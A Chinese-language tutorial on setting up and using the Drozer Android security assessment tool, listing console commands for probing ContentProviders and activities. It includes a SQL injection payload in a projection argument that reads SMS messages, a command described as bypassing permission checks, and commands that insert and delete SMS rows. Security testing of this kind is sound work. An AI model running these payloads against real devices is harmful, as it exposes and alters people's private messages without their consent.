Drozer 是一款强大的 Android 应用安全评估工具,它原名为 mercury,主要用来发现和利用 Android 应用程序的安全漏洞。Drozer 允许安全研究人员通过代理服务端(在安卓设备上运行的 `drozer-agent-2.3.4.apk`)与 PC 客户端(`drozer-installer-win32`)进行交互,从而检查应用程序的权限滥用、数据泄露和其他安全问题。
为了使用 Drozer,你需要在 PC 上安装 JDK 1.6,并将其路径添加到环境变量中。同时,将 Drozer 客户端安装到指定目录,并配置 `C:\Users\user_name\.drozer_config` 文件,确保正确指定了 Java 和相关工具的路径。例如,配置 `java.exe`、`javac.exe` 和 `dx.bat` 的路径。
接下来,你需要在安卓设备上安装 `drozer-agent-2.3.4.apk` 并启动 `drozerAgent` 应用,开启服务。然后,通过 PC 上的 `adb` 命令行工具设置 TCP 端口转发,将端口 31415 映射到设备上,以便 PC 端与安卓设备通信。
一旦设置完成,你可以通过 `drozer.bat console connect` 命令连接到安卓设备。使用 Drozer 的一系列命令来执行安全测试,例如:
1. **查询数据库对应的 URI**:`dz> run app.provider.finduri com.android.providers.telephony`
这个命令用于查找指定应用(如 `com.android.providers.telephony`)提供的 ContentProvider 中可访问的数据库 URI。
2. **收集 ContentProvider 信息**:`dz> run app.provider.info -a com.android.providers.contacts`
该命令用于收集 `com.android.providers.contacts` 应用程序的 ContentProvider 信息,查找可能存在的安全风险。
3. **探测可查询的 URI**:`dz> run scanner.provider.finduris -a com.android.providers.telephony`
通过这个命令,可以发现 `com.android.providers.telephony` 应用中可以被查询的 ContentProvider URI。
4. **查询数据库内容**:`dz> run app.provider.query content://wappush --projection "* from 'sms' ORDER BY date ASC LIMIT 1;--"`
这个命令允许你查询指定的 URI(如 `content://wappush`),并执行 SQL 查询以获取数据,这里演示了如何获取短信内容。
Drozer 还提供了其他多种功能,如:
- **查找所有应用包信息**:`dz> run app.package.list`
- **查看特定包的信息**:`dz> run app.package.info -a com.android.systemui`
- **收集 Activity 信息**:`dz> run app.activity.info -a com.android.systemui`
- **构造 Intent 绕过权限验证**:`dz> run app.activity.start --component com.google.android.apps.messaging.com.google.android.apps.messaging.ui.ConversationListActivity --flags ACTIVITY_NEW_TASK`
- **数据库操作**:
- **查看数据库内容**:`dz> run app.provider.query content://wappush --projection "SELECT * FROM 'sms'"`
- **插入数据**:`dz> run app.provider.insert content://wappush --data "{'body': 'Test Message', 'thread_id': 1}"`
- **删除数据**:`dz> run app.provider.delete content://wappush --selection "body='Test Message'"`
了解这些基本操作后,你可以深入研究 Drozer 的更多模块和命令,以进行更全面的安卓应用安全性评估。参考链接中提供了详细的安装指南和模块命令大全,可以帮助你进一步掌握 Drozer 的使用技巧。
